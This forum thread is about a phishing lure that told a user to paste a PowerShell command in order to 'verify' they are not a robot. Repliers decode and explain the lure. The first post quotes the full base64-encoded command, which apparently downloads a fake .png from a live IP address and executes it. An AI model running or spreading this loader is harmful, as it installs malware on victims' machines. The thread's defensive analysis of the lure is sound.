• We’re currently investigating an issue related to the forum theme and styling that is impacting page layout and visual formatting. The problem has been identified, and we are actively working on a resolution. There is no impact to user data or functionality, this is strictly a front-end display issue. We’ll post an update once the fix has been deployed. Thanks for your patience while we get this sorted.

Malware or Virus?

J

jswany82

Junior Member
I received an email at work, that looked exactly like a typical email invitation I get. I clicked the link and it took me to a page that looks just like the login page, but if gave me a robot detector. It said I had to verify I was not a robot and told me to paste this into my CMD-R:

powershell -wind mi -Enc aQBlAHgAKAAoACcAegBpAHoAdwB6AHoAcgAgADkANAAuADEANQA5AC4AMQAxADMALgAzADcALwBzAHoAcwB6AGQALgB6AHAAbgB6AGcAfABpAHoAegBlAHoAeAAnACkALgByAGUAcABsAGEAYwBlACgAJwB6ACcALAAnACcAKQApAA==

Obviously I am not going to do it, but what does this command do?
 
Interesting. That's a base-64 encoded command. Decode it and it includes a Powershell command to "replace('z','')" to de-obfuscate another command. It looks like it downloads a ".png file" from a URL, and then executes it. It's pretty clear that's not a PNG image. It's probably more Powershell scripts, but I'm not going to that URL to find out.
 
It is exactly that.

The IP address of the fake .png file says it is hosted somewhere in the Russian Federation.

@jswany82 , in the future don't click on unknown links like that. Just report it, delete it, and move on.

The really good hackers will get you when you click the link and won't need you to self-execute the malware like the script kiddies do.

It truly isn't worth finding out what happens when pigs fly.
 
Lol yeah don't enter arbitrary commands into the shell...

We sometimes have to do cybersecurity "training" at work, it's mostly just a 15 minute thing you click through and it shows examples of phishing emails etc. There was one example that actually talked about this new "trick". I had to laugh when I saw it because I can't imagine someone would fall for that. Their example did not use any kind of encoding so you could clearly see it was downloading an executable from a site then running it.

I'm not familiar with powershell but looking at that I assume that string is encoded. It's not base64 as I tried to decode it but it did not do anything.

I asked Grok to see if it can detect the encoding and decode it as I was curious what it would be, but I think I broke Grok. :tearsofjoy:

Screenshot from 2026-03-09 16-49-58.png

Screenshot from 2026-03-09 16-51-49.png



Edit: ChatGPT was a bit more graceful here.

So this is actually quite clever what they did, it is base64 but there's lot of obfuscation going on. But yeah it loads a virus in your machine. Don't go to that IP or URL shown!


Screenshot from 2026-03-09 16-57-13.png
 
Last edited:
You must log in or register to reply here.

TRENDING THREADS

Back
Top